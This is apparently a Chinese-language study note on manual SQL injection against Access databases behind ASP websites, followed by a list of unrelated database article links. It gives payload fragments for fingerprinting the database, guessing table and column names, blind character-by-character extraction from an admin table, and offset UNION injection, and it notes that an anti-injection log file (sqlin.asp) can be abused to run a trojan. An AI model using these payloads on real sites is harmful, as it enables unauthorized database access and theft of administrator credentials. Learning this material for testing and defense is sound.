Access数据库

  • access是没有数据库的;只有表

  • 流程

    • 判断数据库类型--->判断表名----> 判断列名---->判断列名长度(列中第一条记录数据长度)---->读取数据
  • asp网站常用数据库:access和mssql数据库

  • 判断数据库

    • 如果有msysobjects则是access数据库;如果有sysobjects则是sqlsever数据库
    • and exists (select * from msysobjects)>0 access
    • and exists (select * from sysobjects)>0 sqlserver
  • 查表

    • and exists (select * from 表名)
  • 查列名

    • and exists (select 列名 from 表名)
  • 判断列名长度

    • and (select top 1 len(列名) from 表名)>5 :列名是否大于5
  • 逐字符爆破

    • and (select top 1 asc(mid(user,1,1)) from admin)=97
    • asc() 返回字符的ascii码
    • top 1 :只返回最上面一条数据
  • 偏移注入(需要结合联合查询)

    • 联合查询补充字段数=当前表的字段数-查询表的字段数*N
    • union select 1,2,3,4,5,,,* from admin_user :*代表了admin_user的总字段数的倍数
  • 通用性防注入

    • 将输入的行为存放到sqlin.asp文件中;类似于日志
    • 该操作会导致文件木马程序的执行;相当于文件上传了
相关推荐
数据安全技术观察16 小时前
数据动态脱敏:让脱敏策略跟着数据目录走
大数据·网络·数据库
小席是个热心肠17 小时前
Redis的自我学习
数据库·redis·学习
2601_9657984717 小时前
Salient Theme Setup Guide for Fast Creative WordPress Sites
数据库·web3·php·wordpress
@Mike@18 小时前
09-数据库学习笔记(数据库索引与过滤器)
数据库·笔记
程序员夏洛19 小时前
MySQL 中 count(*)、count(1) 和 count(字段名) 有什么区别?
数据库·mysql
Wang's Blog19 小时前
PostgreSQL笔记34:索引优化策略全景解析——从B-tree到HOT的核心原理与实践
数据库·笔记·postgresql
l12586519 小时前
# RAG向量数据库优化实战:HNSW索引调参与生产级性能设计
数据库·python·mysql·langchain
梦Arrebol19 小时前
Mysql内容及相关实验
数据库·mysql
OceanWaves199320 小时前
mysql 8.0.32 磁盘爆满,清理从库日志
数据库·mysql
凤山老林20 小时前
数据库读写分离与动态路由实战:Spring Boot + ShardingSphere-JDBC 生产配置
数据库·spring boot·后端·分库分表·sharding-jdbc